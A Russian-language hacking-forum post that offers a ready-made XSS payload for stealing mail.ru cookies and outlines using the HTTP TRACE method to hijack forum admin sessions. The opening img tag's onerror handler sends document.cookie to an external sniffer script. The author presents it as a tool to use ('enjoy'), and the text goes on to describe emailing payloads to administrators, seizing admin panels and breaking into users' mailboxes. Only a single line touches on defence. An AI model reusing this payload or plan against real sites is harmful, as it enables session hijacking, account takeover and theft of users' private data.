Код HTML:
<img src=http://www.xss.gif s='"p">'onerror=i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; style=visibility:hidden>
Просто все хотели готовый код куки воровать на mail.ru так что вот вам. Резвитесь.
P.S.
Чтобы обезопасится от такой атаки, достаточно просто выключить загрузку картинок в своем браузере.
Но однако не совсем ок, ибо логически можно провести атаку метода Tarce, о котором Я как нить тоже напишу статью.
Method Trace
Метод Trace, это такой способ, который позволяет проводить атаку XSS вне зависимости где находится жертва. Как мы все знаем, куки не переходят от одной области в другую, то есть если Я сейчас создам страницу на narod.ru с кодом воровки кук, и тут на античатовском форуме пройдусь по этой ссылки залогинившися при этом в мой аккунт, то мои куки полетят на сниффер от НАРОДА а не от форума античата. С методом трейс однако, это легко обходится. Болие того, если картинки отключены, то тоже реально упереть куки если провести эту атаку, которую можно провести где угодно. Понимайте метод трейс, как метод атаки XSS на WWW в любом месте, в любое время.
Как узнать если этот метод поддерживается?
Очень просто, он всегда включен по умолчанию, но можно и проверить написав код или на Джаваскрипт, или же воспользоваться этой ссылкой.
http://web-sniffer.net/
Можно ли ломануть античатовский форум этим методом? Да! Реально ли? Да! Убийство ли это времени? О да! +)
Как? Да очень просто, совсем не обязательно просить или нудить кого нибудь посетить нашу ссылку которая будет воровать куки Админов а то и сессию админской панели, когда это можно сделать в любом месте и сделать чтобы скрипт срабатывал автоматически и без ведо админа, ну к примеру просто послав Админу или кому угодно на античате на мыло к примеру мейл.ру письмо, или туда где админ или наша жертва обитает будь то уязвимый форум, чат т.д. и вместо кода сниффера для мейл.ру, впаять код сниффера для античатовского форума. Так как ИП теперь у нас привязывается к сессии (Кстати это из-за меня +) ) и кук нам не совсем достаточно, то есть два пути:
1. Или уловить админа и своровать админ-панельские куки, которые можно тут же применить и выполнить с ними собственный скрипт сделав себя админом, или же, узнавать с помощью скрипта мыльники пользователей и их взламывать, что для меня очень легко делать через XSS. Потом можно сделать себе ретрив паролей. +)
Ну логически будет просто метод трейс отключить так? Ведь все что нужно, так это отключить на античате этот метод и усе.....
А ведь можно еще и заставить проксю, то есть прокси сервер которым античатовец пользуется, вернуть нам трейс информацию, то есть - его куки. +)
Короче вот интересная чтива.
http://www.cgisecurity.com/whitehat-...per_screen.pdf
http://www.modsecurity.org/archive/a...rikes_back.txt
Тут очень все ясно и понятно.